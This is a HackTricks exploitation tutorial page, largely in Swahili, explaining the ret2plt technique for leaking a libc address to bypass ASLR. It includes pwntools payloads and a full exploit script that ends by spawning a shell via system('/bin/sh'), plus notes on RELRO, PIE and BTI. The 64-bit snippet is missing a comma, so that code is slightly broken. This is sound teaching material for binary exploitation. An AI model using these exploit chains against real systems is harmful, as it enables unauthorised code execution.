Ret2plt

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Lengo la mbinu hii ni leak an address from a function from the PLT ili kuweza kuvuka ASLR. Hii ni kwa sababu, kwa mfano, ukileak anwani ya kazi puts kutoka libc, unaweza kisha kalkulisha msingi wa libc na kuhesabu offsets ili kupata kazi nyingine kama system.

Hii inaweza kufanywa kwa payload ya pwntools kama (from here):

# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)

# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)

Angalia jinsi puts (ukitumia anwani kutoka PLT) inavyoitwa na anwani ya puts iliyoko katika GOT (Global Offset Table). Hii ni kwa sababu wakati puts inachapisha kipengee cha GOT cha puts, kipengee hiki kitabeba anwani kamili ya puts katika kumbukumbu.

Pia angalia jinsi anwani ya main inavyotumiwa katika exploit, ili wakati puts inapomaliza utekelezaji wake, binary inamuita main tena badala ya kutoka (hivyo leaked address itaendelea kuwa halali).

Caution

Angalia jinsi ili hii ifanye kazi, binary haiwezi kukusanywa kwa PIE au lazima uwe umepata leak ili kuipita PIE ili kujua anwani za PLT, GOT na main. Vinginevyo, unahitaji kuipita PIE kwanza.

Unaweza kupata full example of this bypass here. Hii ilikuwa exploit ya mwisho kutoka kwa mfano:

Full exploit example (ret2plt leak + system) ```python from pwn import *

elf = context.binary = ELF(‘./vuln-32’) libc = elf.libc p = process()

p.recvline()

payload = flat( ‘A’ * 32, elf.plt[‘puts’], elf.sym[‘main’], elf.got[‘puts’] )

p.sendline(payload)

puts_leak = u32(p.recv(4)) p.recvlines(2)

libc.address = puts_leak - libc.sym[‘puts’] log.success(f’LIBC base: {hex(libc.address)}’)

payload = flat( ‘A’ * 32, libc.sym[‘system’], libc.sym[‘exit’], next(libc.search(b’/bin/sh\x00’)) )

p.sendline(payload)

p.interactive()

</details>

## Mambo ya kisasa

- **`-fno-plt` builds** (common in modern distros) replace `call foo@plt` with `call [foo@got]`. If the binary has no `foo@plt` stub, you can still leak the resolved address with `puts(elf.got['foo'])` and then **return directly to the GOT entry** (`flat(padding, elf.got['foo'])`) to jump into libc once lazy binding has completed.
- **Full RELRO / `-Wl,-z,now`**: GOT is read‑only but ret2plt still works for leaks because you only read the GOT slot. If the symbol was never called, your first ret2plt will also perform lazy binding and then print the resolved slot.
- **ASLR + PIE**: if PIE is enabled, first leak a code pointer (e.g., saved return address, function pointer, or `.plt` entry via another format‑string/infoleak) to compute the PIE base, then build the ret2plt chain with the rebased PLT/GOT addresses.
- **Non‑x86 architectures with BTI/PAC (AArch64)**: PLT entries are valid BTI landing pads (`bti c`), so when exploiting on BTI‑enabled binaries prefer jumping into the PLT stub (or another BTI‑annotated gadget) instead of directly into a libc gadget without BTI, otherwise the CPU will raise `BRK`/`PAC` failures.
- **Quick resolution helper**: if the target function is not yet resolved and you need a leak in a single shot, chain the PLT call twice: first `elf.plt['foo']` (to resolve) then again `elf.plt['foo']` with the GOT address as argument to print the now‑filled slot.

## Mifano mingine & Marejeo

- [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html)
- 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. Baada ya kupata canary, hutengenezwa ROP gadget kupiga puts ili ku-leak anwani ya puts kutoka GOT na kisha ROP gadget kupiga `system('/bin/sh')`
- [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html)
- 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget.

## Marejeo

- [MaskRay – All about Procedure Linkage Table](https://maskray.me/blog/2021-09-19-all-about-procedure-linkage-table)

> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>